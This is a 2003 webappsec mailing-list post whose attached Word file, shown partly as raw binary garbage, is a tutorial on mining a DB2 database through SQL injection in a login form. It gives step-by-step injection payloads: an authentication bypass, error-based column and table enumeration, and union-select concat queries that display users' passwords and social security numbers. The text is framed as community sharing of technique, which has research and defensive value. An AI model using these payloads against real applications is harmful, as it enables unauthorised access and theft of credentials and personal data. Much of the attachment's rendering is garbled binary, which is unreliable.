'DB2 database mining with SQL injection'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       webappsec
Subject:    DB2 database mining with SQL injection
From:       fr0stman <fr0stman () sun-tzu-security ! net>
Date:       2003-08-25 20:53:55
[Download RAW message or body]

Attached is a write up on how to mine data from DB2 with SQL injection.
This is most likely not the most efficient way to do this but hey it
works. Please by all means contribute other methods.



-- 


-- fr0stman --

Victorious warriors win first and then go to war, while defeated
warriors go to war first and then seek to win.

Sun-tzu, The Art of War. Strategic Assessments

["DB2 database mining with SQL injection.doc" (DB2 database mining with SQL injection.doc)]

ذدà،±ل>‏ے	/1‏ےےے.ےےےےےے \
ےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےے \
ےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےے \
ےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےے \
ےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےے \
ےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےى¥ء \
U@	ً؟ـbjbj¬›¬›	""خٌخٌـ \
ےےےےےےˆ222 \
2222FNNNNj \
Fُ*’’’’’’’’t \
vvvvvv$Rq¬ڑ \
2’’’’’ڑ \
22’’¯’2 \
’2’t \
’t,22 \
,’†0¶¬”Hkأ \
N°ذ,tإ0ُ,€‚ \
,FF2222 \
2,H’’’’’’’ڑڑFF¤	ê
 dFFê
 \
 \
 \
 \
 \
 \
 \
 \
How \
to mine data from a DB2 database with SQL injection



I have to start by saying this is nothing new I’m just trying to explain how it’s \
working for me. ( I’m sure there are better methods of doing this and please by all \
means revise the document and contribute it back to the community. Portions of this \
write up were taken from SPI Dynamics SQL injection papers and OWASP’s papers on SQL \
injection. Many thanks to all of those guys.

Scenario: 

You have a web application that is vulnerable to SQL injection. The backend database \
is DB2 and detailed error messages are turned on. The vulnerable web app is using the \
following SQL statement to determine if the user can login:

Select * from applogin where name = ‘username’ and password = ‘password’;

If you enter:
Username = ‘ or 1=1—

You get a page stating: 

	Welcome Bob

So now we know Bob is the first user in the database and the application is \
displaying the username in the HTML when we login.

Time to get the rest of the columns:

Username = ‘ group by 1—

An expression starting with "NAME" specified in a SELECT clause<snip>


Username = ‘ group by name—

An expression starting with "SOCIAL_SECURITY_NO" specified in a SELECT clause<snip>


and we continue this until all columns are obtained and there are no more detailed \
error messages. Now we need the final piece which is the table name so we’re going to \
try and brute force some of the SQL statement:

Username = ‘ or ‘

An unexpected token "from applogin where name = '' OR" was found<snip>

We got the applogin table name.

Note:
Other values to try to brute the table name portion: (Taken from SPI Dynamics SQL \
injection paper).

‘Badvalue
‘ or ‘
‘ or
;
9,9,9


Now we have all the columns and the tablename. Let’s get the data. We can’t use the \
old tricks of sum(varchar), etc like in MSSQL since DB2 won’t display the data in the \
error.  We use the function concat and since the variable “name” is displayed in the \
HTML when we login we’ll concatenate the two columns we want as the variable “name” \
and view it as the application displays it in the HTML.

The statement below is showing we enumerated 4 columns with the:

Username = ‘ group by name,social_security_no,comments,password–

The a’s are placeholders to match up the correct number of columns so we don’t get a \
lame error telling us we didn’t match up the columns. Now ee put the following in:

Username = ' union all select concat(name,social_security_no) as name ,'a','a','a' \
from applogin where social_security_no > '1';


You get a page stating:

	Welcome Bob123456789

Where Bob is the username and 123456789 the SSN. This can be done to mine all the \
data with changing the statement around such as:

Username = ' union all select concat(name,password) as name ,'a','a','a' from \
applogin where name > 'c';

You get a page stating:

Welcome joeqwerty

Where joe is the username and qwerty is the password. As I said above questions or \
comments on how to do this better are welcome. I can be contacted at:

fr0stman@sun-tzu-security.net
7:;V`dr›‌‍ں$	5	>	¶	·	 \
ؤ	ح	د	ك	ç	 
%
I
J
b
o
y
}
†
©
6ACRS§²IJhِïèنàنàـàصنـنـنخïاأـنـنأنأنأـأـأـأ·® \
أنأھأکƒsأhـ!îB*CJOJQJaJph(h‚	dhـ!î5پB*CJOJQJaJph"h‚	d5پB*CJOJQJaJphh8ahـ!î5پCJ \
aJ hـ!îhـ!î5پCJ aJ \
hـ!îh¸\‎5پ>*h‚	dh‚	d	jJًh‚	dhجXXh‚	dh¸\‎h‚	d5پ>*hـ!î5پ>*hـ!îhـ!î5پ>*-89:;·	¸	أ	ؤ	«
 ¬
ِ
÷
45BC \
أèéIJ÷÷÷÷ٍ \
÷ييييي \
ييييييي \
ييييييي \
ييgdـ!îgd‚	d$a$gdـ!î \
ـ‎ \
 \
 \
 \
 \
JKgh¼½¾–
 —
©
ھ
ٌ
ٍ
}~ˆڈ”–œ‌‍)*klْْ \
ْْْْْْْ \
ُُُْْْ \
ُُُُُُُ \
ُْْْْْgdëgdـ!îh¼¾ظ
 

 
!
P
†
ٹ
•
ھ
ٌ
ٍ
ِ
ù
‌‍¹ضغâéRWd¼تزéً'()*=iw‚«¬¯ر9ëغ×س×د×ثادسدا² \
اœاد”داثدثدثدسدثدثگثگŒثسثœث×ˆœˆœˆدˆœˆدh‚	dhq \
h)UGh¸\‎h¸\‎5پh8a"hë5پB*CJOJQJaJph(hëhë5پ \
B*CJOJQJaJphhëhœhًh¸\‎hجXXhـ!îhـ!îB*CJOJQJ \
aJph(h‚	dhـ!î5پB*CJOJQJaJph5l®VWطظعٍَ	
 چژ÷ّ#$½¾ـْْْ \
ْْْْْْْ \
ًًًُُُْ \
ççْْْ \
„ذ^„ذgdح#ضgdح#ضgd‚	dgdـ!î9>UVb×طôے
 ;Œچ™¸ہëôِ"#$%Y¼½ـüّ \
ôًéًôفشذôجôجإجإجإج¹°ش©ذ¥ü،ü \
hـ!îhth‚	dhthح#ض5پCJ \
aJ hـ!îhح#ض5پCJ aJ h‚	dhح#ضhح#ضhv^ h‚	d5پCJ aJ \
hـ!îh‚	d5پCJ aJ h‚	dh‚	dhœhًh‚	dh¸\‎h8a 1گh°ذ/ \
°à=!°"°#گ $گ %° \
 \
 \
 \
 \
œ \
@@ٌے@NormalCJ_HaJmH	sH	tH	DA@ٍے،DDefault \
Paragraph FontRi@َے³RTable \
Normalِ4ض l4ضaِ(k@ôےء(No \
Listـ" \
ےےےے89:;·¸أؤ«¬ِ÷45BC \
أèéIJKgh¼½¾–—©ھٌٍ \
}~ˆڈ”–œ‌‍)*kl®V	W	ط	ظ	ع	ٍ	َ		
 

چ
ژ
÷
ّ
#$½¾قک0€€8ک0€€x \
ک0€€ک0€€xک0€€ک \
0€€xک0€€ک0€€ک \
0€€ک0€€xک0€€ک0 \
€€ک0€€ک0€€ک0 \
€€ک0€€xک0€€xک0 \
€€ک0€€xک0€€ک0€€ک0€€ \
€ک0€€ک0€€xک0€€ \
ک0€€ک0€€ک0€€ \
€ک0€€€ک0€€€ک0€€ \
€ک0€€€ک0€€ \
€ک0€€ک0€€ک0€€ک0€€ \
€ک0€€€ک0€€€ک0€€ \
€ک0€€€ک0€€0€ک0€€ک0€€ \
€ک0€€ €ک0€€ €ک0€€ \
ک0€€ک0€€xک0€€ \
€ک0€€ک0€€ک0€€ \
ک0€€ک0€€xک0€€ک0€€xک0€€ک0€€ \
€ک0€€ €ک0€€ک0€€ \
€ک0€€ €ک0€€€ک0€€ \
€ک0€€€ک0€€ک0€€ \
ک0€€ک0€€xک0€€ \
ک0€€ک0€€ک0€€ \
ک0€€ک0€€ک0€€ \
أèéIJKgh¼½¾–—©ھٍV	W	ط	ع	ٍ	َ		
 

چ
ژ
÷
ّ
#$ق;0œ…hl†
;0€
;0€‎ےےے
;0€;0œ…ôl†
;0€
;0€‎ےےے‎ےےے
;0
œ…
ô
;0
€
;0
€ےےےے
;0€ےےےے‎ےےے; \
0€ےےےے‎ےےے \
;0€;0€‎ےےے‎ےےے
 ;0€
;0€;0œ…´ڈô;0€
;0€
;0€
{0€ےےےے‎ےےے0‎ےےے0;0$œ…@5Oh9ـ
 Jlـ
ـt{؛ ؤج‎‡ \
ثdj‚«²µ=	?	u	{	|	“	ں	¨	¯	·	¾	ذ	¬
 ²
³
ہ
ج
ص
ـ
ن
"*-¾غق \
•¶ôûV]¾ء¢¦ˆŒڈ“—›w~®µu	|	


:
¬
³
*-¾ق33333333333333336AéKf—ھ~‌9	W	ô		
 ¦½¾غق¾غقےےfrostهtq
 8a)UGجXX‚	dv^ \
ëح#ضـ!îœhً¸\‎ے@€غغ¤:•GGغغـ°@ےے \
UnknownےےےےےےےےےےےےGگ‡z \
€ےTimes New \
Roman5گ€Symbol3&گ‡z \
€ےArial;گ€Wingdings7&گ‡ \
ںVerdana"qˆًذhضثx&$جx& Jإ
إ
!ً \
 \
 \
´´پپ24ضض \
3ƒًH)ًے?نےےےےےےےےےےےےےےےےےےےےےـ!îےے7How \
to mine data from a DB2 database with SQL \
injectionfrostfrost \
 \
 \
‏ےà…ںٍùOh«‘+'³ظ0œگکطنô \
	0< Xd
p|„Œ”ن8How to mine data from a DB2 \
database with SQL injectionow frost \
mrosrosNormal.dot \
frost.d10sMicrosoft Word 10.0@<rV \
@ü(>kأ@8v~Hkأإ \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
‏ےصحصœ.“—+,ù®0 \
hp|„Œ”œ¤¬´
 ¼نIBMض{
8How to mine data from a DB2 database \
with SQL injectionTitle \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
 \
	
 
‏ےےے‏ےےے \
!"#$%‏ےےے'()*+,-‏ےےے‎ےےے0‏ےےے‏ےےے‏ےےےےےےےےےے \
ےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےے \
ےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےے \
ےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےRoot \
Entryےےےےےےےے	ہ \
FPŒہ”Hkأ2€1Table \
ےےےےےےےےWordDo \
cumentےےےےےےےے \
""SummaryInformation \
(ےےےےDocume \
ntSummaryInformation8ےےےےےےےےےےےے \
&CompObj \
ےےےےےےےےےےےےj \
ےےےےےےےےےےےے \
 \
ےےےےےےےےےےےے‏ےےےےےےےےےےےے \
ےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےے \
ےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےے \
ےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےے \
ےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےے \
ےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےےے‏ے
 ےےےے	ہFMicrosoft Word Document
MSWordDocWord.Document.8ô9²q \
 \
 \
 \





[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic